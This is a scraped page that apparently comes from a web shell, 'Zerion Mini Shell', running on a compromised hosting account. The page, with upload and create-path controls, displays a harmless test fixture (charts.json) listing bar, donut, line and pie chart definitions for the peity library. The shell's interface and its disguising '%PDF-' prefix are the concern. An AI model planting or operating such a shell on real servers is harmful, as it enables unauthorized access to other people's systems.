%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/jalalj2hb/public_html/ftm-admin/bower_components/peity/test/
Upload File :
Create Path :
Current File : /home/jalalj2hb/public_html/ftm-admin/bower_components/peity/test/charts.json

{
  "bar1": {
    "type": "bar",
    "text": "5,0,9,6,5,9,7,3,5,2",
    "width": 32,
    "height": 16
  },
  "bar2": {
    "type": "bar",
    "text": "0,3,2,-1,-3,-2,2,3,5,2",
    "opts": {
      "width": 64,
      "height": 32
    },
    "width": 64,
    "height": 32
  },
  "bar3": {
    "type": "bar",
    "text": "-3,0,-6,-4,-5,-4,-7,-3,-5,-2",
    "width": 32,
    "height": 16
  },
  "bar4": {
    "type": "bar",
    "text": "5,3,9,6,5,9,7,3,5,2",
    "opts": "{ fill: ['red', 'green', 'blue'] }",
    "width": 32,
    "height": 16
  },
  "bar5": {
    "type": "bar",
    "text": "5,3,2,-1,-3,-2,2,3,5,2",
    "opts": "{ fill: function(value) { return value > 0 ? 'green' : 'red' } }",
    "width": 32,
    "height": 16
  },
  "bar6": {
    "type": "bar",
    "text": "0,-3,-6,-4,-5,-4,-7,-3,-5,-2",
    "opts": "{ fill: function(_, i, all) { var g = parseInt((i / all.length) * 255); return 'rgb(255, ' + g + ', 0)' } }",
    "width": 32,
    "height": 16
  },
  "bar7": {
    "type": "bar",
    "text": "0,0,0,0,0",
    "width": 32,
    "height": 16
  },
  "bar8": {
    "type": "bar",
    "text": "1,1,1,1,1",
    "width": 32,
    "height": 16
  },
  "bar9": {
    "type": "bar",
    "text": "1,1,1,1,1",
    "opts": {
      "min": 1
    },
    "width": 32,
    "height": 16
  },
  "bar10": {
    "type": "bar",
    "text": "-10,-15,-13,-14,-11",
    "width": 32,
    "height": 16
  },
  "bar11": {
    "type": "bar",
    "text": "-10,-15,-13,-14,-11",
    "opts": {
      "max": 0
    },
    "width": 32,
    "height": 16
  },
  "bar12": {
    "type": "bar",
    "text": "1000,1005,1003,1004,1001",
    "opts": {
      "min": null
    },
    "width": 32,
    "height": 16
  },
  "bar13": {
    "type": "bar",
    "text": "5,3,9,6,5,9,7,3,5,2",
    "opts": {
      "max": "25"
    },
    "width": 32,
    "height": 16
  },
  "bar14": {
    "type": "bar",
    "text": "5,0,9,6,5,9,7,3,5,2",
    "opts": "{ after: function() { this.$svg.append(this.svgElement('line', { stroke: 'black', x1: 0, x2: this.x(9), y1: this.y(9), y2: this.y(0) })) } }",
    "width": 32,
    "height": 16
  },
  "donut1": {
    "type": "donut",
    "text": "1/5",
    "width": 16,
    "height": 16
  },
  "donut2": {
    "type": "donut",
    "text": "0.52/1.561",
    "opts": {
      "radius": 16
    },
    "width": 32,
    "height": 32
  },
  "donut3": {
    "type": "donut",
    "text": "1,4",
    "opts": {
      "width": 32
    },
    "width": 32,
    "height": 16
  },
  "donut4": {
    "type": "donut",
    "text": "4,7,6,5",
    "opts": {
      "fill": ["cyan", "magenta", "yellow", "black"],
      "height": 32
    },
    "width": 16,
    "height": 32
  },
  "donut5": {
    "type": "donut",
    "text": "3/3",
    "width": 16,
    "height": 16
  },
  "donut6": {
    "type": "donut",
    "text": "0/3",
    "width": 16,
    "height": 16
  },
  "donut7": {
    "type": "donut",
    "text": "3,0",
    "width": 16,
    "height": 16
  },
  "donut8": {
    "type": "donut",
    "text": "4/3",
    "width": 16,
    "height": 16
  },
  "donut9": {
    "type": "donut",
    "text": "1/5",
    "opts": {
      "innerRadius": 6
    },
    "width": 16,
    "height": 16
  },
  "donut10": {
    "type": "donut",
    "text": "1,-2,3",
    "width": 16,
    "height": 16
  },
  "donut11": {
    "type": "donut",
    "text": "-2/3",
    "width": 16,
    "height": 16
  },
  "donut12": {
    "type": "donut",
    "text": "0,0,0,0,0",
    "width": 16,
    "height": 16
  },
  "donut13": {
    "type": "donut",
    "text": "2,4,5",
    "opts": "{ after: function() { var xy = this.scale(4, 4); this.$svg.append(this.svgElement('rect', { fill: 'none', height: 3, stroke: 'black', width: 3, x: xy[0], y: xy[1] })) } }",
    "width": 16,
    "height": 16
  },
  "line1": {
    "type": "line",
    "text": "5,3,9,6,5,9,7,3,5,2",
    "opts": {
      "fill": "yellow",
      "stroke": "red",
      "strokeWidth": 2
    },
    "width": 32,
    "height": 16
  },
  "line2": {
    "type": "line",
    "text": "5,3,2,-1,-3,-2,2,3,5,2",
    "opts": {
      "width": 64,
      "height": 32
    },
    "width": 64,
    "height": 32
  },
  "line3": {
    "type": "line",
    "text": "0,-3,-6,-4,-5,-4,-7,-3,-5,-2",
    "width": 32,
    "height": 16
  },
  "line4": {
    "type": "line",
    "text": "5,3,9,6,5,9,7,3,5,2",
    "opts": {
      "max": 25
    },
    "width": 32,
    "height": 16
  },
  "line5": {
    "type": "line",
    "text": "0,0,0,0,0",
    "width": 32,
    "height": 16
  },
  "line6": {
    "type": "line",
    "text": "1,1,1,1,1",
    "opts": {
      "min": 1
    },
    "width": 32,
    "height": 16
  },
  "line7": {
    "type": "line",
    "text": "-10,-15,-13,-14,-11",
    "width": 32,
    "height": 16
  },
  "line8": {
    "type": "line",
    "text": "-10,-15,-13,-14,-11",
    "opts": {
      "max": 0
    },
    "width": 32,
    "height": 16
  },
  "line9": {
    "type": "line",
    "text": "1000,1005,1003,1004,1001",
    "opts": {
      "min": null
    },
    "width": 32,
    "height": 16
  },
  "line10": {
    "type": "line",
    "text": "5,3,9,6,5,9,7,3,5,2",
    "opts": {
      "max": "25"
    },
    "width": 32,
    "height": 16
  },
  "line11": {
    "type": "line",
    "text": "5,3,9,6,5,9,7,3,5,2",
    "opts": {
      "fill": null
    },
    "width": 32,
    "height": 16
  },
  "line12": {
    "type": "line",
    "text": "5,0,9,6,5,9,7,3,5,2",
    "opts": "{ after: function() { this.$svg.append(this.svgElement('line', { stroke: 'black', x1: 0, x2: this.x(9), y1: this.y(9), y2: this.y(0) })) } }",
    "width": 32,
    "height": 16
  },
  "pie1": {
    "type": "pie",
    "text": "1/5",
    "width": 16,
    "height": 16
  },
  "pie2": {
    "type": "pie",
    "text": "0.52/1.561",
    "opts": {
      "radius": 16
    },
    "width": 32,
    "height": 32
  },
  "pie3": {
    "type": "pie",
    "text": "1,4",
    "opts": {
      "width": 32
    },
    "width": 32,
    "height": 16
  },
  "pie4": {
    "type": "pie",
    "text": "4,7,6,5",
    "opts": {
      "fill": ["cyan", "magenta", "yellow", "black"],
      "height": 32
    },
    "width": 16,
    "height": 32
  },
  "pie5": {
    "type": "pie",
    "text": "3/3",
    "width": 16,
    "height": 16
  },
  "pie6": {
    "type": "pie",
    "text": "0/3",
    "width": 16,
    "height": 16
  },
  "pie7": {
    "type": "pie",
    "text": "3,0",
    "width": 16,
    "height": 16
  },
  "pie8": {
    "type": "pie",
    "text": "4/3",
    "width": 16,
    "height": 16
  },
  "pie9": {
    "type": "pie",
    "text": "1,-2,3",
    "width": 16,
    "height": 16
  },
  "pie10": {
    "type": "pie",
    "text": "-2/3",
    "width": 16,
    "height": 16
  },
  "pie11": {
    "type": "pie",
    "text": "0,0,0,0,0",
    "width": 16,
    "height": 16
  },
  "pie12": {
    "type": "pie",
    "text": "2,4,5",
    "opts": "{ after: function() { var xy = this.scale(4, 2); this.$svg.append(this.svgElement('rect', { fill: 'none', height: 3, stroke: 'black', width: 3, x: xy[0], y: xy[1] })) } }",
    "width": 16,
    "height": 16
  }
}

Zerion Mini Shell 1.0